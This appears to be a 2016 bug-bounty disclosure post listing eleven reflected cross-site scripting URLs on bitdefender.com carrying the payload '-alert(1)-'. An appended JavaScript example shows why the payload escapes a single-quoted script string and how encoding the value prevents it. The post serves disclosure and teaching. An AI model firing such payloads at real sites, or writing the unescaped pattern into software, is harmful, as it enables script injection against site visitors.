
Published on September 9th, 2016


bitdefender.com bug bounty- 250$ (11 XSS Cross-site scripting reflected) fixed




Hi Bitdefender security team

------------------------------------------------------------------------
My name is Emad Abou Shanab from Egypt

-------------------------------------------------------------------------
The bug is Cross-site scripting (reflected)

The domain is bitdefender.com = 11 XSS bugs

The payload = '-alert(1)-'
-------------------------------------------------------------------------
The vulnerable URLs

1:- http://www.bitdefender.com/?ctrsel=1b3sl5'-alert(1)-'mkpqs
2:- http://www.bitdefender.com/box/?icid=NA_box2016_homepage_bannerzo622'-alert(1)-'ntdzv
3:- http://www.bitdefender.com/business/aws-security.html?icid=business_menubybbh'-alert(1)-'c2plp
4:- http://www.bitdefender.com/business/cloud-security-for-msps.html?icid=business_menumkwf4'-alert(1)-'f0urs
5:- http://www.bitdefender.com/business/renew/?icid=NA_quickrenew2015_homepage_bannerwlic2'-alert(1)-'q0sir
6:- http://www.bitdefender.com/business/security-for-msps-kaseya.html?icid=business_menus0n1e'-alert(1)-'bjk2q
7:- http://www.bitdefender.com/business/service-providers.html?icid=business_menuzjvy2'-alert(1)-'hdjj5
8:- http://www.bitdefender.com/company.html?ajax=hgi57'-alert(1)-'rsk2w
9:- http://www.bitdefender.com/media/html/digitalife2016/?pid=HPB_NA_digitalife2016&icid=NA_back2school2016_homepage_bannerumg0o'-alert(1)-'xpomp
10:- http://www.bitdefender.com/media/html/digitalife2016/?pid=HPB_NA_digitalife2016nlkpx'-alert(1)-'vvrkh&icid=NA_back2school2016_homepage_banner
11:- http://www.bitdefender.com/media/html/enterprise-cybersecurity/?icid=NA_brand_businessbrandawarenessivuka'-alert(1)-'blz7y

-------------------------------------------------------------------------
I hope you fix it ASAP

Thanks for watching
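
Why the `'-alert(1)-'` payload in this report works, and the output-encoding fix, as an added example that is not part of the original report or of Bitdefender's code. It assumes the parameter was reflected into a single-quoted string inside an inline script (the report does not show the markup); `renderNaive`, `renderHardened`, `escapeForJsString` and `run` are hypothetical names.

```javascript
// The icid value from URL 3 in the report, payload included.
const SAMPLE = "business_menubybbh'-alert(1)-'c2plp";

// ASSUMED vulnerable template (hypothetical; the report does not show the markup):
// the query value is pasted into a single-quoted string in an inline script.
function renderNaive(icid) {
  return "var icid = '" + icid + "';";
}

// Escape every UTF-16 code unit that is not an ASCII letter or digit as \uXXXX,
// so the value cannot close the string literal or the enclosing <script> element.
function escapeForJsString(value) {
  const s = String(value);
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : '\\u' + s.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

// Same template as renderNaive, with the value encoded for its JS string context.
function renderHardened(icid) {
  return "var icid = '" + escapeForJsString(icid) + "';";
}

// Run a rendered script body with a stub alert() that only counts calls.
function run(scriptBody) {
  let alerts = 0;
  const fn = new Function('alert', scriptBody + '\nreturn icid;');
  const value = fn(() => { alerts += 1; });
  return { alerts, value };
}

console.log(renderNaive(SAMPLE), run(renderNaive(SAMPLE)));
console.log(renderHardened(SAMPLE), run(renderHardened(SAMPLE)));
```

In the naive output the quote closes the string early and `alert(1)` becomes an operand of a subtraction, so it runs; in the hardened output the whole value stays inside the string literal as data.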



2016-09-08 23:32:31
